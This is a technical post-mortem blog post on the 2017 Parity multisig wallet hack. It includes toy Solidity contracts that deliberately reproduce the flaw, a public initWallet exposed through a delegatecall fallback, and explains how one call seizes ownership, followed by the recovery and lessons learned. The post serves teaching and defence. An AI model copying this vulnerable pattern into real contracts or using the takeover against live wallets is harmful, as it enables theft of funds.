An In-Depth Look at the Parity Multisig Bug

Multiple signatures

Multiple signatures are better than one.

This year’s IC3-Ethereum bootcamp brought together the Ethereum Foundation’s top developers, IC3 students and faculty, and dozens of others from industry and academia. We worked together over the course of a week on ten exciting, intensive development projects, and ended with a bang on the last day. The Ethereum wallet rescue group (with a little help from a couple of IC3ers) scrambled to respond when 153,037 Ether (worth $30+ million) was stolen from three large Ethereum multisig wallet contracts.

The MultisigExploit-Hacker (MEH), as he, she, or they are known, exploited a vulnerability in the Parity 1.5 client’s multisig wallet contract. A fairly straightforward attack allowed the hacker to take ownership of a victim’s wallet with a single transaction. The attacker could then drain the victim’s funds, as happened in these three transactions once the wallets were compromised. The victims were three ICO projects: Edgeless Casino, Swarm City, and æternity.

In the following we will give an in-depth technical explanation of the hack, describe the white-hat response, and draw some lessons about how such breaches might be prevented in the future.

How the attack worked

There are many reports that the vulnerability was due to the simple omission of an “internal” modifier that made it possible for anyone anywhere to take ownership of an existing wallet due to Solidity’s “default-public” policy. While it is true that the addition of the right modifiers would have prevented the attack, the attack is a little more clever than this would suggest.

The vulnerable MultiSig wallet was split into two contracts to reduce the size of each wallet and save gas: A library contract called “WalletLibrary” and an actual “Wallet” contract consuming the library. Here is a toy version of WalletLibrary:

contract WalletLibrary {
     address owner;

     // called by constructor
     function initWallet(address _owner) {
         owner = _owner;
         // ... more setup ...
     }

     function changeOwner(address _new_owner) external {
         if (msg.sender == owner) {
             owner = _new_owner;
         }
     }

     function () payable {
         // ... receive money, log events, ...
     }

     function withdraw(uint amount) external returns (bool success) {
         if (msg.sender == owner) {
             return owner.send(amount);
         } else {
             return false;
         }
     }
}

WalletLibrary looks pretty boring: Beyond some initialization code that will be called in the constructor of Wallet, WalletLibrary provides the basic functionality you would expect from a wallet: Anybody can deposit money into the wallet, but only the owner can withdraw her funds or change the owner of the wallet.

Here’s an example, simplified contract that could be using this WalletLibrary:

contract Wallet {
    address _walletLibrary;
    address owner;

    function Wallet(address _owner) {
        // replace the following line with “_walletLibrary = new WalletLibrary();”
        // if you want to try to exploit this contract in Remix.
        _walletLibrary = <address of pre-deployed WalletLibrary>;
        _walletLibrary.delegatecall(bytes4(sha3("initWallet(address)")), _owner);
    }

    function withdraw(uint amount) returns (bool success) {
        return _walletLibrary.delegatecall(bytes4(sha3("withdraw(uint)")), amount);
    }

    // fallback function gets called if no other function matches call
    function () payable {
        _walletLibrary.delegatecall(msg.data);
    }
}

This time, the code looks more complex. Notice the use of delegatecall throughout the contract. delegatecall is designed to enable the use of shared libraries, saving precious storage space on the blockchain otherwise wasted in duplicating widely used, standard code.

delegatecall works by executing the program code of a contract in the environment (and with the storage) of its calling client contract. This means that the library code will run, but will directly modify the data of the client calling the library. It essentially is as if the code of the library had been pasted into the client issuing the delegatecall. Any storage writes inside the delegatecall will be made to the storage of the client, not the storage of the library. delegatecall allows a client contract to delegate the responsibility of handling a call to another contract.

At the EVM level, a contract is just a single program that takes a variable-length binary blob of data as input and produces a variable-length binary blob of data as its output. A transaction in EVM provides an address and some data. If the address holds code, this data is used in a “jump table” like structure in the beginning of the contract’s code, with some of the data (the “function selector”) indexing jumps to different parts of contract code using the standard encodings described in the Ethereum Contract ABI specification. Above, the function selector for calling a function called initWallet that takes an address as its argument is the mysterious looking bytes4(sha3("initWallet(address)")).

Now that we understand delegatecall and how function selectors work, we can read and understand the Wallet contract. To begin with, we have a simple constructor that delegates the initialization of the contract’s state to WalletLibrary. This is followed by a withdraw function which, once again, delegates its task to WalletLibrary.

Finally, we want our wallet to be able to receive funds. This is commonly handled with a Solidity construct called a fallback function. A fallback function is a default function that a contract is able to call to respond to data that doesn’t match any function in the lookup table. Since we might want all sorts of logic to be triggered upon the receipt of funds (e.g. logging events), we again delegate this to WalletLibrary and pass along any data we might have received with the call. This data forwarding also exposes WalletLibrary’s changeOwner function, making it possible to change the Wallet’s owner.

Wallet is now completely vulnerable. Can you spot the vulnerability?

You might have noticed that the initWallet function of WalletLibrary changes the owner of the Wallet. Whoever owns the Wallet can then withdraw whatever funds are contained in the contract. But as you can see, initWallet is only executed in the constructor of Wallet (which can only run once, when Wallet is created), and Wallet doesn’t itself have an initWallet function. Any calls sending this function selector to Wallet in a transactions’ data won’t match.

So, the attacker cannot call Wallet.initWallet(attacker) to change the owner of the wallet and we are safe after all‽

As it turns out, the implementation of the fallback function means that we are not. As we already saw, a fallback function is a default function that a contract is able to call to respond to data that doesn’t match any function in the lookup table. The intent is to allow contracts to respond to receipt of funds and/or unexpected data patterns; in our wallet, it both enables funds receipt and allows for functions to be called in the wallet library that are not explicitly specified in the wallet.

One use of such a “generic forward” feature could be upgradeability, with the pattern perhaps even recommended as a security precaution for the event that the need for additional functions not anticipated at release time became known: By allowing the wallet’s owner to change the address of the library contract, one could keep the wallet with its funds at the same address while changing the underlying implementation. In the Parity contract, it is likely that forwarding data was only done to save gas costs, as the contract is not upgradeable and all forwards could have been made explicit at compile time. Instead, this implicit default forwarding was used over explicit forwarding to expose certain functions like revoke.

So, when an attacker calls Wallet.initWallet(attacker), Wallet’s fallback function is triggered (Wallet doesn’t implement an initWallet function), and the jump table lookup fails. Wallet’s fallback function then delegatecalls WalletLibrary, forwarding all call data in the process. This call data consists of the function selector for the initWallet(address) function and the attacker’s address. When WalletLibrary receives the call data, it finds that its initWallet function matches the function selector and runs initWallet(attacker) in the context of Wallet, setting Wallet’s owner variable to attacker. BOOM! The attacker is now the wallet’s owner and can withdraw any funds at her leisure.

In reality, the initWallet function was more complicated and took more parameters, but the principle of the attack is exactly the one described above. You can see one of the initWallet calls of the attacker; the attacker then immediately withdrew the funds, earning her 26,793 ETH (or ~6.1 million USD). Not bad for two function calls and 60 cents in gas cost!

If initWallet had been marked as internal, there would have been no corresponding entry in the jump table, making it impossible to call initWallet from outside the contract. If initWallet had checked for double initialization, there would also have been no problem. Adding to the confusion is the fact that certain functions that are supposed to be callable from outside the contract are marked as external; one could easily wrongly assume that all functions not marked as external aren’t visible from the outside. In the Parity’s patch to the vulnerable contract, a modifier was added to a helper function of the vulnerable wallet initialization process to throw an exception if the attacked initialization function was re-called.

The response

A white-hat recovery team (MEH-WH) developers identified and drained all remaining vulnerable wallets into this wallet. They recovered a total of $78 million worth of tokens (half the value being BAT and ICONOMI) plus 377,105+ ETH (around $72 million). The funds will be returned to their owners as noted on r/ethereum:

If you hold a multisig contract that was drained, please be patient. [The MEH-WH] will be creating another multisig for you that has the same settings as your old multisig but with the vulnerability removed and will return your funds to you there.

This is all well and good for the recovered funds, but the stolen funds are in all likelihood unrecoverable. The Ethereum community cannot, for instance, easily execute a hard fork as they did in the case of The DAO. The DAO had a built-in 34-day delay, during which the stolen funds were locked into the contract and subject to recovery. The MEH only needs to identify compliant exchanges to cash out or convert to ZEC to retain the stolen funds with full anonymity. The MEH has already cashed out small amounts, as in this roughly 50 ETH transaction at Changelly.

Unless the hacker trips up, the community will have to resign itself to the loss of the money---more than in any U.S. bank robbery -- and an enduring mystery over the identity of the thief / thieves. In case you’re wondering, none of our ten bootcamp projects involved stealing ETH from multisig wallets. :)

Lessons

Looking at the history of the vulnerable contract in Parity’s github repository, we find that the contract was first added as a complete blob of code on December 16 of last year in commit 63137b. The contract was edited extensively once, on March 7 in commit 4d08e7b and then wasn’t touched until the attack occurred. Since the contract was originally added as one big blob, it was likely copied from somewhere else, making its provenance in development unclear. Note that the first version of the contract already contained the vulnerable code.

It is hard to believe that such an large (and valuable!) vulnerability could have gone undiscovered for such a long time. However, in light of the contract’s length and complexity and the complex interactions between Solidity’s fallback functions, its default-public visibility of functions, delegatecalls, and call data forwarding, that enable the attack, this seems less surprising. At least one other multisig contract had an analogous bug that stemmed from the lack of a function modifier.

We believe that there are multiple levels on which lessons should be drawn from this attack:

First of all, we recommend that Solidity adopt a default-private level of visibility for contract functions. This change would have likely prevented this exploit and others like it. This may be an opportunity to batch a number of other safe usability related changes, much needed additional types, and solutions to common gripes into Solidity. It's also an opportune time to think about versioning at the source language level, to be able to easily introduce new features into the language without having to worry about backwards compatibility.

In a more general sense, we believe that this attack was the result of security’s oldest enemy, complexity: It seems likely that the missing function modifiers would have been discovered by the developers if Wallet had just been a single contract instead of delegatecalling out to WalletLibrary. Even without this modifier, Wallet would not have been vulnerable as long as Wallet’s fallback function wouldn’t have unconditionally forwarded any calldata to WalletLibrary, exposing unexpected functions able to modify the data in Wallet.

Interestingly, this specific attack may not have been caught by testing as implemented by most developers, since the vulnerability wasn’t caused by incorrect behaviour of a function, but rather by the unexpected exposure of a function (that behaved correctly) to the public. Nevertheless, we do, of course, strongly recommend that smart contract authors thoroughly test their contracts, and a test policy that included testing for function visibility on every function would have exposed the issue.

The creation of a rigorously followed best practices guide for testing and smart contract review that requires that visibility assumptions be made explicit and tested is thus, we believe, one of the strong lessons from this attack. Today, it is not uncommon to see large contracts deployed with only a handful of unit tests, with little to no reasoning about interaction between contracts, and with unit tests that do not even accomplish full statement or decision coverage. Beyond these glaring omissions of basic software quality techniques standard in the space, it remains apparent that there is still work to be done in understanding best practices for high level tooling and language design for smart contracts.

The Parity project has released a post-mortem giving a high level overview of the attack and discussing the steps Parity will take in the future to ensure that such an attack will not happen again. Many of their conclusions agree with the ones we made here.

Acknowledgements

We would like to thank Everett Hildenbrandt of the KEVM project for his feedback and helpful suggestions on explaining the attack.

Share on Linkedin
Share on Reddit
comments powered by Disqus